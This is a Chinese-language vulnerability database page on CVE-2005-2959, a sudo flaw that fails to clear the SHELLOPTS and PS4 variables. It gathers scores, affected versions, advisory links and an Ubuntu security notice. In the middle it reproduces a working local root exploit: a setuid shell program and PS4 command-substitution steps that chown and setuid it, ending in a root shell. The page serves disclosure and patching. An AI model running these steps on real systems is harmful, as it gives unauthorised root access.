CVE-2005-2959
CVSS4.6
发布时间 :2005-10-25 12:02:00
修订时间 :2011-07-28 00:00:00
NMCOPS    

[原文]Incomplete blacklist vulnerability in sudo 1.6.8 and earlier allows local users to gain privileges via the (1) SHELLOPTS and (2) PS4 environment variables before executing a bash script on behalf of another user, which are not cleared even though other variables are.


[CNNVD]Todd Miller Sudo本地权限提升漏洞(CNNVD-200510-198)

        Sudo是一款允许用户以其他用户权限安全的执行命令的程序,广泛使用在Linux和Unix操作系统下。
        Sudo中存在本地权限提升漏洞,有一定权限的本地用户可能利用此漏洞以高权限执行任意系统命令。Sudo不能充分的过滤环境变量。SHELLOPTS和PS4变量都是危险的变量,但仍传递给了以特权用户运行的程序。这可能导致在执行bash脚本时以特权用户的权限执行任意命令。请注意仅有获得了受限超级用户权限的攻击者才可以利用这些漏洞。

- CVSS (基础分值)

CVSS分值: 4.6 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-264 [权限、特权与访问控制]

- CPE (受影响的平台与产品)

cpe:/a:todd_miller:sudo:1.6.5Todd Miller Sudo 1.6.5
cpe:/a:todd_miller:sudo:1.6.3_p7Todd Miller Sudo 1.6.3 p7
cpe:/a:todd_miller:sudo:1.6.7_p5
cpe:/a:todd_miller:sudo:1.6Todd Miller Sudo 1.6
cpe:/a:todd_miller:sudo:1.6.4p1
cpe:/a:todd_miller:sudo:1.6.6Todd Miller Sudo 1.6.6
cpe:/a:todd_miller:sudo:1.6.3_p6
cpe:/a:todd_miller:sudo:1.6.5_p1
cpe:/a:todd_miller:sudo:1.6.3_p3
cpe:/a:todd_miller:sudo:1.6.3_p2
cpe:/a:todd_miller:sudo:1.6.3p4
cpe:/a:todd_miller:sudo:1.6.4_p1
cpe:/a:todd_miller:sudo:1.6.1Todd Miller Sudo 1.6.1
cpe:/a:todd_miller:sudo:1.6.3_p5
cpe:/a:todd_miller:sudo:1.6.5p1
cpe:/a:todd_miller:sudo:1.6.3Todd Miller Sudo 1.6.3
cpe:/a:todd_miller:sudo:1.6.4p2Todd Miller Sudo 1.6.4p2
cpe:/a:todd_miller:sudo:1.6.8Todd Miller Sudo 1.6.8
cpe:/a:todd_miller:sudo:1.6.3p1
cpe:/a:todd_miller:sudo:1.6.3p3
cpe:/a:todd_miller:sudo:1.6.4Todd Miller Sudo 1.6.4
cpe:/a:todd_miller:sudo:1.6.3p2
cpe:/a:todd_miller:sudo:1.6.7Todd Miller Sudo 1.6.7
cpe:/a:todd_miller:sudo:1.6.3_p4
cpe:/a:todd_miller:sudo:1.6.3p7
cpe:/a:todd_miller:sudo:1.6.5p2
cpe:/a:todd_miller:sudo:1.6.3p5
cpe:/a:todd_miller:sudo:1.6.4_p2
cpe:/a:todd_miller:sudo:1.6.3p6
cpe:/a:todd_miller:sudo:1.6.3_p1
cpe:/a:todd_miller:sudo:1.6.5_p2
cpe:/a:todd_miller:sudo:1.6.2Todd Miller Sudo 1.6.2

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2959
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2959
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200510-198
(官方数据源) CNNVD

- 其它链接及资源

http://www.us-cert.gov/cas/techalerts/TA07-072A.html
(UNKNOWN)  CERT  TA07-072A
http://www.debian.org/security/2005/dsa-870
(VENDOR_ADVISORY)  DEBIAN  DSA-870
http://secunia.com/advisories/17390
(VENDOR_ADVISORY)  SECUNIA  17390
http://www.vupen.com/english/advisories/2007/0930
(VENDOR_ADVISORY)  VUPEN  ADV-2007-0930
http://www.sudo.ws/bugs/show_bug.cgi?id=182
(UNKNOWN)  CONFIRM  http://www.sudo.ws/bugs/show_bug.cgi?id=182
http://www.securityfocus.com/bid/15191
(UNKNOWN)  BID  15191
http://www.securityfocus.com/advisories/9643
(VENDOR_ADVISORY)  SUSE  SUSE-SR:2005:025
http://www.openpkg.org/security/OpenPKG-SA-2006.002-sudo.html
(UNKNOWN)  OPENPKG  OpenPKG-SA-2006.002
http://www.novell.com/linux/security/advisories/2006_02_sr.html
(UNKNOWN)  SUSE  SUSE-SR:2006:002
http://www.mandriva.com/security/advisories?name=MDKSA-2005:201
(UNKNOWN)  MANDRIVA  MDKSA-2005:201
http://secunia.com/advisories/24479
(VENDOR_ADVISORY)  SECUNIA  24479
http://secunia.com/advisories/18549
(VENDOR_ADVISORY)  SECUNIA  18549
http://secunia.com/advisories/17666
(VENDOR_ADVISORY)  SECUNIA  17666
http://secunia.com/advisories/17345
(VENDOR_ADVISORY)  SECUNIA  17345
http://secunia.com/advisories/17322
(VENDOR_ADVISORY)  SECUNIA  17322
http://secunia.com/advisories/17318
(VENDOR_ADVISORY)  SECUNIA  17318
http://lists.apple.com/archives/security-announce/2007/Mar/msg00002.html
(UNKNOWN)  APPLE  APPLE-SA-2007-03-13
http://docs.info.apple.com/article.html?artnum=305214
(UNKNOWN)  CONFIRM  http://docs.info.apple.com/article.html?artnum=305214

- 漏洞信息

Todd Miller Sudo本地权限提升漏洞
中危 输入验证
2005-10-25 00:00:00 2006-09-05 00:00:00
本地  
        Sudo是一款允许用户以其他用户权限安全的执行命令的程序,广泛使用在Linux和Unix操作系统下。
        Sudo中存在本地权限提升漏洞,有一定权限的本地用户可能利用此漏洞以高权限执行任意系统命令。Sudo不能充分的过滤环境变量。SHELLOPTS和PS4变量都是危险的变量,但仍传递给了以特权用户运行的程序。这可能导致在执行bash脚本时以特权用户的权限执行任意命令。请注意仅有获得了受限超级用户权限的攻击者才可以利用这些漏洞。

- 公告与补丁

        暂无数据

- 漏洞信息 (F41442)

sudo168p10.sh.txt (PacketStormID:F41442)
2005-11-10 00:00:00
breno  
exploit,local,root
CVE-2005-2959
[点击下载]

Local root exploit for sudo versions below 1.6.8p10 that makes use of the environment cleaning flaws with the SHELLOPTS and PS4 variables.

exploit for adv :  http://www.securityfocus.com/bid/15191/info


## Sudo local root escalation privilege ##
## vuln versions :  sudo < 1.6.8p10
## by breno

## You need sudo access execution for some bash script ##
## Use csh shell to change SHELLOPTS env ##

ie:
	%cat x.sh
	% cat x.sh
	#!/bin/bash -x

	echo "Getting root!!"
	%             
##

## 
	# cat /etc/shadow
	...
	breno   ALL=(ALL) /home/breno/x.sh
	..
	#

## Let's use an egg shell :)
	%cat egg.c

#include <stdio.h>

	int main()
	{
        setuid(0);
        system("/bin/sh");
        }
        %
               
% gcc -o egg egg.c
% setenv SHELLOPTS xtrace
% setenv PS4 '$(chown root:root egg)'
% sudo ./x.sh
echo Getting root!!
Getting root!!
% ls -lisa egg
1198941 8 -rwxr-xr-x  1 root root 7428 2005-11-09 13:54 egg
% setenv PS4 '$(chmod +s egg)'
% sudo ./x.sh
echo Getting root!!
Getting root!!
% ./egg
sh-3.00# id
uid=0(root) gid=1000(breno) egid=0(root) grupos=7(lp),102(lpadmin),1000(breno)
sh-3.00#                   
    

- 漏洞信息 (F41087)

Ubuntu Security Notice 213-1 (PacketStormID:F41087)
2005-11-01 00:00:00
Ubuntu  security.ubuntu.com
advisory,arbitrary,shell
linux,ubuntu
CVE-2005-2959
[点击下载]

Ubuntu Security Notice USN-213-1 - Tavis Ormandy discovered a privilege escalation vulnerability in sudo. On executing shell scripts with sudo, the P4 and SHELLOPTS environment variables were not cleaned properly. If sudo is set up to grant limited sudo privileges to normal users this could be exploited to run arbitrary commands as the target user.

===========================================================
Ubuntu Security Notice USN-213-1	   October 28, 2005
sudo vulnerability
CVE-2005-2959
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 4.10 (Warty Warthog)
Ubuntu 5.04 (Hoary Hedgehog)
Ubuntu 5.10 (Breezy Badger)

The following packages are affected:

sudo

The problem can be corrected by upgrading the affected package to
version 1.6.7p5-1ubuntu4.3 (for Ubuntu 4.10), 1.6.8p5-1ubuntu2.2 (for
Ubuntu 5.04), or 1.6.8p9-2ubuntu2.1 (for Ubuntu 5.10).  In general, a
standard system upgrade is sufficient to effect the necessary changes.

Details follow:

Tavis Ormandy discovered a privilege escalation vulnerability in sudo.
On executing shell scripts with sudo, the "P4" and "SHELLOPTS"
environment variables were not cleaned properly. If sudo is set up to
grant limited sudo privileges to normal users this could be exploited
to run arbitrary commands as the target user.

Updated packags for Ubuntu 4.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.6.7p5-1ubuntu4.3.diff.gz
      Size/MD5:    21082 c81698c37a6dabb9eccf9d9c4a0b48e9
    http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.6.7p5-1ubuntu4.3.dsc
      Size/MD5:      585 dfd36c233ae8bfb0b16d6995683c4bb6
    http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.6.7p5.orig.tar.gz
      Size/MD5:   349785 55d503e5c35bf1ea83d38244e0242aaf

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)

    http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.6.7p5-1ubuntu4.3_amd64.deb
      Size/MD5:   156228 ea32212dcf00d19b65df967cf16d7138

  i386 architecture (x86 compatible Intel/AMD)

    http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.6.7p5-1ubuntu4.3_i386.deb
      Size/MD5:   145676 f04e61af4af0740dbd21f8365be2005e

  powerpc architecture (Apple Macintosh G3/G4/G5)

    http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.6.7p5-1ubuntu4.3_powerpc.deb
      Size/MD5:   153246 70cf540392b2fa601564cfb1a2b3b1e7

Updated packags for Ubuntu 5.04:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.6.8p5-1ubuntu2.2.diff.gz
      Size/MD5:    24513 1a6fa0bf72bdc96cd873c10d2607c470
    http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.6.8p5-1ubuntu2.2.dsc
      Size/MD5:      585 6b50f803e5627991dc92846244e7ae08
    http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.6.8p5.orig.tar.gz
      Size/MD5:   584832 03538d938b8593d6f1d66ec6c067b5b5

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)

    http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.6.8p5-1ubuntu2.2_amd64.deb
      Size/MD5:   170356 3c158ee2844029be088446f6a58b0aae

  i386 architecture (x86 compatible Intel/AMD)

    http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.6.8p5-1ubuntu2.2_i386.deb
      Size/MD5:   158662 5c72a5a138b401fe03d164ae6a454bd3

  powerpc architecture (Apple Macintosh G3/G4/G5)

    http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.6.8p5-1ubuntu2.2_powerpc.deb
      Size/MD5:   165390 831a1b3806ec0e2ebd4429cf0334dd4e

Updated packags for Ubuntu 5.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.6.8p9-2ubuntu2.1.diff.gz
      Size/MD5:    21867 259154beb440d8162588bbf30d697d98
    http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.6.8p9-2ubuntu2.1.dsc
      Size/MD5:      585 8439503439e0bc52951aa0b71c93904f
    http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.6.8p9.orig.tar.gz
      Size/MD5:   585509 6d0346abd16914956bc7ea4f17fc85fb

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)

    http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.6.8p9-2ubuntu2.1_amd64.deb
      Size/MD5:   172296 0e01662adeada9a1a20431f576059f05

  i386 architecture (x86 compatible Intel/AMD)

    http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.6.8p9-2ubuntu2.1_i386.deb
      Size/MD5:   158766 f3858eb968eaa1ae295d39cfe3e4e7d0

  powerpc architecture (Apple Macintosh G3/G4/G5)

    http://security.ubuntu.com/ubuntu/pool/main/s/sudo/sudo_1.6.8p9-2ubuntu2.1_powerpc.deb
      Size/MD5:   166862 84538e98f7e7bb93a37fa228e55a7fb5
    

- 漏洞信息

20303
sudo Environment Variable Manipulation Local Privilege Escalation
Local Access Required Input Manipulation
Loss of Integrity

- 漏洞描述

- 时间线

2005-10-25 Unknow
Unknow Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Todd Miller Sudo Local Privilege Escalation Vulnerability
Input Validation Error 15191
No Yes
2005-10-25 12:00:00 2007-03-14 03:24:00
Discovery is credited to Tavis Ormandy.

- 受影响的程序版本

Ubuntu Ubuntu Linux 5.10 powerpc
Ubuntu Ubuntu Linux 5.10 i386
Ubuntu Ubuntu Linux 5.10 amd64
Ubuntu Ubuntu Linux 5.0 4 powerpc
Ubuntu Ubuntu Linux 5.0 4 i386
Ubuntu Ubuntu Linux 5.0 4 amd64
Ubuntu Ubuntu Linux 4.1 ppc
Ubuntu Ubuntu Linux 4.1 ia64
Ubuntu Ubuntu Linux 4.1 ia32
Trustix Secure Linux 3.0
Trustix Secure Linux 2.2
Trustix Secure Enterprise Linux 2.0
Todd Miller Sudo 1.6.8 p9
Todd Miller Sudo 1.6.8 p8
+ OpenPKG OpenPKG 2.4
+ OpenPKG OpenPKG Current
+ Red Hat Fedora Core4
Todd Miller Sudo 1.6.8 p7
+ Debian Linux 3.1 sparc
+ Debian Linux 3.1 s/390
+ Debian Linux 3.1 ppc
+ Debian Linux 3.1 mipsel
+ Debian Linux 3.1 mips
+ Debian Linux 3.1 m68k
+ Debian Linux 3.1 ia-64
+ Debian Linux 3.1 ia-32
+ Debian Linux 3.1 hppa
+ Debian Linux 3.1 arm
+ Debian Linux 3.1 amd64
+ Debian Linux 3.1 alpha
+ Debian Linux 3.1
+ OpenPKG OpenPKG 2.3
Todd Miller Sudo 1.6.8 p5
+ Ubuntu Ubuntu Linux 5.0 4 powerpc
+ Ubuntu Ubuntu Linux 5.0 4 i386
+ Ubuntu Ubuntu Linux 5.0 4 amd64
Todd Miller Sudo 1.6.8 p1
+ Mandriva Linux Mandrake 10.2 x86_64
+ Mandriva Linux Mandrake 10.2
+ Mandriva Linux Mandrake 10.1 x86_64
+ Mandriva Linux Mandrake 10.1
+ OpenPKG OpenPKG 2.2
+ OpenPKG OpenPKG Current
Todd Miller Sudo 1.6.8
Todd Miller Sudo 1.6.7 p5
+ Conectiva Linux 10.0
+ Conectiva Linux 9.0
+ MandrakeSoft Corporate Server 3.0 x86_64
+ MandrakeSoft Corporate Server 3.0
+ Mandriva Linux Mandrake 10.0 AMD64
+ Mandriva Linux Mandrake 10.0
+ OpenPKG OpenPKG 2.1
+ Red Hat Fedora Core3
+ Ubuntu Ubuntu Linux 4.1 ppc
+ Ubuntu Ubuntu Linux 4.1 ia64
+ Ubuntu Ubuntu Linux 4.1 ia32
Todd Miller Sudo 1.6.7
Todd Miller Sudo 1.6.6
+ Conectiva Linux 8.0
+ Conectiva Linux 7.0
+ Conectiva Linux 6.0
+ Conectiva Linux 5.1
+ Conectiva Linux 5.0
+ Conectiva Linux graficas
+ Conectiva Linux ecommerce
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0
+ MandrakeSoft Corporate Server 2.1 x86_64
+ MandrakeSoft Corporate Server 2.1
+ Slackware Linux 8.0
Todd Miller Sudo 1.6.5 p2
+ NetBSD NetBSD 1.5.2
+ OpenBSD OpenBSD 3.1
+ RedHat Linux 7.2 ia64
+ RedHat Linux 7.2 i386
+ RedHat Linux 7.2 alpha
+ RedHat Linux 7.1 ia64
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1 alpha
+ RedHat Linux 7.0 i386
+ RedHat Linux 7.0 alpha
- RedHat Linux 6.2 sparc
- RedHat Linux 6.2 i386
- RedHat Linux 6.2 alpha
+ S.u.S.E. Linux 8.0 i386
+ S.u.S.E. Linux 8.0
Todd Miller Sudo 1.6.5 p1
+ Slackware Linux 8.0
Todd Miller Sudo 1.6.5
Todd Miller Sudo 1.6.4 p2
Todd Miller Sudo 1.6.4 p1
+ Conectiva Linux 8.0
+ Conectiva Linux 7.0
+ Conectiva Linux 6.0
+ Conectiva Linux 5.1
+ Conectiva Linux 5.0
+ Conectiva Linux graficas
+ Conectiva Linux ecommerce
Todd Miller Sudo 1.6.4
+ MandrakeSoft Corporate Server 1.0.1
+ MandrakeSoft Single Network Firewall 7.2
+ Mandriva Linux Mandrake 8.2
+ Mandriva Linux Mandrake 8.1 ia64
+ Mandriva Linux Mandrake 8.1
+ Mandriva Linux Mandrake 8.0 ppc
+ Mandriva Linux Mandrake 8.0
+ Mandriva Linux Mandrake 7.2
+ Mandriva Linux Mandrake 7.1
+ RedHat Linux 7.2 ia64
+ RedHat Linux 7.2 i386
+ RedHat Linux 7.2 alpha
+ RedHat Linux 7.1 ia64
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1 alpha
+ RedHat Linux 7.0 i386
+ RedHat Linux 7.0 alpha
- RedHat Linux 6.2 sparc
- RedHat Linux 6.2 i386
- RedHat Linux 6.2 alpha
Todd Miller Sudo 1.6.3 p7
- FreeBSD FreeBSD 4.5
- FreeBSD FreeBSD 4.4
- FreeBSD FreeBSD 4.3
+ RedHat Linux 7.2 ia64
+ RedHat Linux 7.2 i386
+ S.u.S.E. Linux 7.3 sparc
+ S.u.S.E. Linux 7.3 ppc
+ S.u.S.E. Linux 7.3 i386
+ S.u.S.E. Linux 7.3
+ Slackware Linux 8.0
+ Trustix Secure Linux 1.5
+ Trustix Secure Linux 1.2
+ Trustix Secure Linux 1.1
Todd Miller Sudo 1.6.3 p6
+ Guardian Digital Engarde Secure Linux 1.0.1
+ Guardian Digital Engarde Secure Linux 1.0.1
+ HP Secure OS software for Linux 1.0
+ HP Secure OS software for Linux 1.0
+ RedHat Linux 7.1 ia64
+ RedHat Linux 7.1 ia64
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1 alpha
+ RedHat Linux 7.1 alpha
+ S.u.S.E. Linux 7.2 i386
+ S.u.S.E. Linux 7.2
+ S.u.S.E. Linux 7.2
+ S.u.S.E. Linux 7.1 x86
+ S.u.S.E. Linux 7.1 x86
+ S.u.S.E. Linux 7.1 sparc
+ S.u.S.E. Linux 7.1 sparc
+ S.u.S.E. Linux 7.1 ppc
+ S.u.S.E. Linux 7.1 ppc
+ S.u.S.E. Linux 7.1 alpha
+ S.u.S.E. Linux 7.1 alpha
+ S.u.S.E. Linux 7.1
+ S.u.S.E. Linux 7.1
+ S.u.S.E. Linux 7.0 sparc
+ S.u.S.E. Linux 7.0 sparc
+ S.u.S.E. Linux 7.0 ppc
+ S.u.S.E. Linux 7.0 ppc
+ S.u.S.E. Linux 7.0 i386
+ S.u.S.E. Linux 7.0 i386
+ S.u.S.E. Linux 7.0 alpha
+ S.u.S.E. Linux 7.0 alpha
+ S.u.S.E. Linux 7.0
+ S.u.S.E. Linux 7.0
+ Wirex Immunix OS 7.0
+ Wirex Immunix OS 7.0
Todd Miller Sudo 1.6.3 p5
Todd Miller Sudo 1.6.3 p4
+ Slackware Linux 7.1
Todd Miller Sudo 1.6.3 p3
Todd Miller Sudo 1.6.3 p2
Todd Miller Sudo 1.6.3 p1
Todd Miller Sudo 1.6.3
+ RedHat Linux 7.0 i386
+ RedHat Linux 7.0 alpha
Todd Miller Sudo 1.6.2
- Debian Linux 2.2
Todd Miller Sudo 1.6.1
Todd Miller Sudo 1.6
SuSE SUSE Linux Enterprise Server 8
+ Linux kernel 2.4.21
+ Linux kernel 2.4.19
S.u.S.E. SuSE Linux Standard Server 8.0
S.u.S.E. SuSE Linux School Server for i386
S.u.S.E. SUSE LINUX Retail Solution 8.0
S.u.S.E. SuSE Linux Openexchange Server 4.0
S.u.S.E. Open-Enterprise-Server 9.0
S.u.S.E. Novell Linux Desktop 9.0
S.u.S.E. Linux Professional 10.0 OSS
S.u.S.E. Linux Professional 10.0
S.u.S.E. Linux Professional 9.3 x86_64
S.u.S.E. Linux Professional 9.3
S.u.S.E. Linux Professional 9.2 x86_64
S.u.S.E. Linux Professional 9.2
S.u.S.E. Linux Professional 9.1 x86_64
S.u.S.E. Linux Professional 9.1
S.u.S.E. Linux Professional 9.0 x86_64
S.u.S.E. Linux Professional 9.0
S.u.S.E. Linux Professional 8.2
S.u.S.E. Linux Personal 10.0 OSS
S.u.S.E. Linux Personal 9.3 x86_64
S.u.S.E. Linux Personal 9.3
S.u.S.E. Linux Personal 9.2 x86_64
S.u.S.E. Linux Personal 9.2
S.u.S.E. Linux Personal 9.1 x86_64
S.u.S.E. Linux Personal 9.1
S.u.S.E. Linux Personal 9.0 x86_64
S.u.S.E. Linux Personal 9.0
S.u.S.E. Linux Personal 8.2
S.u.S.E. Linux Enterprise Server 9
S.u.S.E. Linux Desktop 1.0
OpenPKG OpenPKG 2.5
OpenPKG OpenPKG 2.4
OpenPKG OpenPKG 2.3
Mandriva Linux Mandrake 2006.0 x86_64
Mandriva Linux Mandrake 2006.0
Mandriva Linux Mandrake 10.2 x86_64
Mandriva Linux Mandrake 10.2
Mandriva Linux Mandrake 10.1 x86_64
Mandriva Linux Mandrake 10.1
MandrakeSoft Multi Network Firewall 2.0
MandrakeSoft Corporate Server 3.0 x86_64
MandrakeSoft Corporate Server 3.0
MandrakeSoft Corporate Server 2.1 x86_64
MandrakeSoft Corporate Server 2.1
Conectiva Linux 10.0
Apple Mac OS X Server 10.4.8
Apple Mac OS X Server 10.4.7
Apple Mac OS X Server 10.4.6
Apple Mac OS X Server 10.4.5
Apple Mac OS X Server 10.4.4
Apple Mac OS X Server 10.4.3
Apple Mac OS X Server 10.4.2
Apple Mac OS X Server 10.4.1
Apple Mac OS X Server 10.4
Apple Mac OS X Server 10.3.9
Apple Mac OS X 10.4.8
Apple Mac OS X 10.4.7
Apple Mac OS X 10.4.6
Apple Mac OS X 10.4.5
Apple Mac OS X 10.4.4
Apple Mac OS X 10.4.3
Apple Mac OS X 10.4.2
Apple Mac OS X 10.4.1
Apple Mac OS X 10.4
Apple Mac OS X 10.3.9
Apple Mac OS X Server 10.4.9
Apple Mac OS X 10.4.9

- 不受影响的程序版本

Apple Mac OS X Server 10.4.9
Apple Mac OS X 10.4.9

- 漏洞讨论

Sudo is prone to a local privilege-escalation vulnerability.

The vulnerability presents itself because the application fails to properly sanitize malicious data supplied through environment variables.

A successful attack may result in a complete compromise.

- 漏洞利用

An exploit is not required. Example text for exploiting this issue is provided by breno@kalangolinux.org:

- 解决方案

Please see the referenced vendor advisories for more information and fixes.


Todd Miller Sudo 1.6.4

Todd Miller Sudo 1.6.6

Todd Miller Sudo 1.6.7 p5

Todd Miller Sudo 1.6.7

Todd Miller Sudo 1.6.8 p9

Todd Miller Sudo 1.6.8 p5

Todd Miller Sudo 1.6.8 p8

Todd Miller Sudo 1.6.8 p1

Todd Miller Sudo 1.6.8 p7

Apple Mac OS X Server 10.3.9

Apple Mac OS X 10.3.9

Apple Mac OS X 10.4

Apple Mac OS X Server 10.4

Apple Mac OS X Server 10.4.1

Apple Mac OS X 10.4.2

Apple Mac OS X Server 10.4.3

Apple Mac OS X 10.4.3

Apple Mac OS X Server 10.4.4

Apple Mac OS X 10.4.4

Apple Mac OS X Server 10.4.5

Apple Mac OS X 10.4.5

Apple Mac OS X Server 10.4.6

Apple Mac OS X Server 10.4.7

Apple Mac OS X 10.4.7

Apple Mac OS X 10.4.8

Apple Mac OS X Server 10.4.8

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站